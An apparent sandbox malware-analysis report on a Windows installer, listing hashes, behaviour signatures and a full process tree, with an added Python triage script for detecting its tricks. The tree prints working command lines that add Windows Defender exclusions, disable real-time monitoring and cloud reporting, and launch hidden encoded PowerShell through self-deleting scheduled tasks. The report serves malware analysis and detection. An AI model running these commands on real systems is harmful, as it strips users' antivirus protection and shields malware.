Resubmissions

15-11-2024 18:05

241115-wpjcdsxrdy 10

11-11-2024 21:40

241111-1h6xbsxcql 10

03-12-2022 17:54

221203-wg4ncscc33 10

Analysis

  • max time kernel
    142s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    11-11-2024 21:40

General

  • Target

    8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff.exe

  • Size

    7.3MB

  • MD5

    83dbe0cb14f889e38fc0f8889842cf9d

  • SHA1

    ded313ca908136000fd9e5f623dcf0974e2b5f30

  • SHA256

    8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff

  • SHA512

    ad4bef13d8b816dc81b42e0a2983cedd8c1b66bb15ffff93d908dd8bb78621c2ec690c44dc01bffb3a378159c42c7552ebd27bdb889eb13351a85a26d61fbac6

  • SSDEEP

    196608:91O0G+ffRqHIxpuBM9lsB1veokOefmev7+RND:3OL+ffRqoxpAQi0POcmez+LD

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 36 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Runs PowerShell with its display window hidden.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 2 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 1 IoCs
  • Drops file in System32 directory 19 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempts to gather information about the system language of the victim host in order to infer its geographical location.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 13 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
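The signatures above summarise the behaviour; the command lines in the Processes section carry the detail: Windows Defender policy and exclusion keys written with REG ADD in both the /reg:32 and /reg:64 views, a PowerShell -EncodedCommand blob (base64 of UTF-16LE text, which is what PowerShell expects), and a scheduled task that is created, run immediately with /I and deleted again. The following Python triage script is an added example, not part of the sandbox report and not code from the sample; it runs those three checks over command lines copied from the tree. The SAMPLE_CMDLINES list is constructed by hand from those lines (the base64 blob is the report's own).

```python
"""Triage helpers for a sandbox process tree: decode PowerShell -EncodedCommand
payloads, classify REG ADD writes that tamper with Windows Defender, and spot
the create/run/delete scheduled-task pattern used to launch them."""
import base64
import re

# Copied verbatim from the schtasks /TR and powershell.EXE command lines above.
ENC = ("cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAA"
       "SABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==")

# Constructed sample input: command lines taken from the Processes section.
SAMPLE_CMDLINES = [
    'REG ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32',
    'REG ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64',
    'REG ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32',
    'REG ADD "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths" /f /v "C:\\Windows\\Temp\\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32',
    'schtasks /CREATE /TN "gWGSDLrCT" /SC once /ST 00:13:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand ' + ENC + '"',
    'schtasks /run /I /tn "gWGSDLrCT"',
    'schtasks /DELETE /F /TN "gWGSDLrCT"',
    'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE -WindowStyle Hidden -EncodedCommand ' + ENC,
]

DEFENDER_ROOTS = (
    "hklm\\software\\policies\\microsoft\\windows defender",  # Group Policy hive
    "hklm\\software\\microsoft\\windows defender",            # product's own key
)


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None.
    PowerShell takes base64 of UTF-16LE text, so a UTF-8 decode gives garbage;
    the abbreviations -e, -ec and -enc are accepted as well."""
    m = re.search(r'-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)', cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _opt(rest, flag):
    """Value of a `/flag value` or `/flag "value"` option in a reg.exe argument tail."""
    m = re.search(r'/' + flag + r'\s+(?:"([^"]*)"|(\S+))', rest, re.I)
    return None if not m else (m.group(1) if m.group(1) is not None else m.group(2))


def classify_reg_add(cmdline):
    """Parse `REG ADD <key> /v <name> /t <type> /d <data> [/reg:32|64]` and explain
    what a write under the Defender keys does. Returns None for anything else."""
    m = re.search(r'\bADD\s+(?:"([^"]+)"|(\S+))(.*)$', cmdline, re.I)
    if not m:
        return None
    key, rest = (m.group(1) or m.group(2)), m.group(3)
    key_l = key.lower()
    if not key_l.startswith(DEFENDER_ROOTS):
        return None
    name, rtype, data = _opt(rest, "v"), _opt(rest, "t"), _opt(rest, "d")
    view = re.search(r'/reg:(32|64)', rest, re.I)
    sub = key_l.split("windows defender", 1)[1].strip("\\")
    lname = (name or "").lower()
    # Under Exclusions\* the value NAME is what gets excluded; the data is a
    # placeholder (normally DWORD 0; the sample even writes REG_SZ "0"), so
    # never key a detection on the data field.
    if sub == "exclusions\\paths":
        effect = f"exclude path {name} from scanning"
    elif sub == "exclusions\\extensions":
        effect = f"exclude every .{name} file from scanning"
    elif sub == "real-time protection" and lname == "disablerealtimemonitoring" and data == "1":
        effect = "disable real-time monitoring"
    elif sub == "spynet" and lname == "spynetreporting" and data == "0":
        effect = "disable MAPS (SpyNet) cloud reporting"
    else:
        effect = f"set {name}={data}"
    return {"key": key, "value": name, "type": rtype, "data": data,
            "view": view.group(1) if view else "default",
            "via_policy": "\\policies\\" in key_l, "effect": effect}


def transient_tasks(cmdlines):
    """Names of scheduled tasks that are created, run (/I ignores the /ST time
    and runs at once) and deleted within the same tree: the task exists only to
    launch its /TR action, here under a different account than the creator."""
    seen = {}
    for c in cmdlines:
        m = re.search(r'\bschtasks(?:\.exe)?\s+/(create|run|delete)\b.*?/tn\s+"?([^"\s]+)"?', c, re.I)
        if m:
            seen.setdefault(m.group(2), set()).add(m.group(1).lower())
    return sorted(n for n, ops in seen.items() if ops == {"create", "run", "delete"})


def triage(cmdlines):
    """Run all three checks over a list of command lines (e.g. a process tree)."""
    return {
        "decoded_powershell": sorted({d for d in map(decode_encoded_command, cmdlines) if d}),
        "defender_writes": [r for r in map(classify_reg_add, cmdlines) if r],
        "transient_tasks": transient_tasks(cmdlines),
    }


if __name__ == "__main__":
    for k, v in triage(SAMPLE_CMDLINES).items():
        print(k, v)
```

On the report's own lines the encoded command decodes to `start-process -WindowStyle Hidden gpupdate.exe /force`, which accounts for the gpupdate.exe children under each powershell.EXE. The same exclusion paths are written under both the Policies hive and the product key, and in both registry views, so a host-side check that reads only one location will miss part of the tampering; on a live machine, compare the output of this script against the Defender registry keys and the task scheduler history rather than trusting either alone.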

Processes

  • C:\Users\Admin\AppData\Local\Temp\8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff.exe
    "C:\Users\Admin\AppData\Local\Temp\8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2196
    • C:\Users\Admin\AppData\Local\Temp\7zS55CE.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2164
      • C:\Users\Admin\AppData\Local\Temp\7zS585D.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2832
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Indirect Command Execution
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2028
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2540
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2576
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
              6⤵
                PID:2648
          • C:\Windows\SysWOW64\forfiles.exe
            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
            4⤵
            • Indirect Command Execution
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2864
            • C:\Windows\SysWOW64\cmd.exe
              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2548
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                6⤵
                  PID:2604
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                  6⤵
                    PID:3028
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /CREATE /TN "gWGSDLrCT" /SC once /ST 00:13:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                4⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:1404
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /run /I /tn "gWGSDLrCT"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:2424
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /DELETE /F /TN "gWGSDLrCT"
                4⤵
                  PID:2588
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "bKwcWZekAnYWEgmozo" /SC once /ST 21:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\GNzryCD.exe\" q8 /site_id 525403 /S" /V1 /F
                  4⤵
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:808
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {4CED6223-CE88-4918-A112-BA1C9187848E} S-1-5-21-3290804112-2823094203-3137964600-1000:VORHPBAB\Admin:Interactive:[1]
            1⤵
              PID:1820
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                2⤵
                • Command and Scripting Interpreter: PowerShell
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1080
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  3⤵
                    PID:2988
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                  2⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:552
                  • C:\Windows\system32\gpupdate.exe
                    "C:\Windows\system32\gpupdate.exe" /force
                    3⤵
                      PID:2008
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Drops file in System32 directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:944
                    • C:\Windows\system32\gpupdate.exe
                      "C:\Windows\system32\gpupdate.exe" /force
                      3⤵
                        PID:2680
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                      2⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Drops file in System32 directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2224
                      • C:\Windows\system32\gpupdate.exe
                        "C:\Windows\system32\gpupdate.exe" /force
                        3⤵
                          PID:2228
                    • C:\Windows\system32\gpscript.exe
                      gpscript.exe /RefreshSystemParam
                      1⤵
                        PID:2744
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {5CF3396A-DB5F-4990-A0FB-252AA97BC74B} S-1-5-18:NT AUTHORITY\System:Service:
                        1⤵
                          PID:2092
                          • C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\GNzryCD.exe
                            C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\GNzryCD.exe q8 /site_id 525403 /S
                            2⤵
                            • Executes dropped EXE
                            • Drops file in System32 directory
                            • System Location Discovery: System Language Discovery
                            PID:2040
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /CREATE /TN "gbpFXpAuK" /SC once /ST 18:15:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                              3⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:868
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /run /I /tn "gbpFXpAuK"
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:1244
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /DELETE /F /TN "gbpFXpAuK"
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2200
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                              3⤵
                                PID:2284
                                • C:\Windows\SysWOW64\reg.exe
                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                  4⤵
                                  • Modifies Windows Defender Real-time Protection settings
                                  • System Location Discovery: System Language Discovery
                                  PID:1872
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                3⤵
                                  PID:1060
                                  • C:\Windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                    4⤵
                                    • Modifies Windows Defender Real-time Protection settings
                                    • System Location Discovery: System Language Discovery
                                    PID:2276
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /CREATE /TN "ggPFTQqmF" /SC once /ST 11:56:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:2388
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /run /I /tn "ggPFTQqmF"
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2248
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /DELETE /F /TN "ggPFTQqmF"
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1900
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                                  3⤵
                                    PID:1192
                                    • C:\Windows\SysWOW64\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                                      4⤵
                                      • Windows security bypass
                                      • System Location Discovery: System Language Discovery
                                      PID:1600
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1100
                                    • C:\Windows\SysWOW64\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                      4⤵
                                      • Windows security bypass
                                      • System Location Discovery: System Language Discovery
                                      PID:2980
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                                    3⤵
                                      PID:2624
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1080
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2076
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1076
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C copy nul "C:\Windows\Temp\YSrBLfWUtIHnuviW\tLuvxbcI\ByueSfwTiIlafwvu.wsf"
                                      3⤵
                                        PID:1072
                                      • C:\Windows\SysWOW64\wscript.exe
                                        wscript "C:\Windows\Temp\YSrBLfWUtIHnuviW\tLuvxbcI\ByueSfwTiIlafwvu.wsf"
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        • Modifies data under HKEY_USERS
                                        PID:2808
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:2704
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:1004
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          PID:2304
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:2924
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          PID:2588
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          PID:2108
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          PID:2080
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:844
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          PID:2700
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          PID:1448
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          PID:1680
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:2116
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          PID:2220
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:2612
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          PID:1960
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:2688
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                            PID:2724
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • System Location Discovery: System Language Discovery
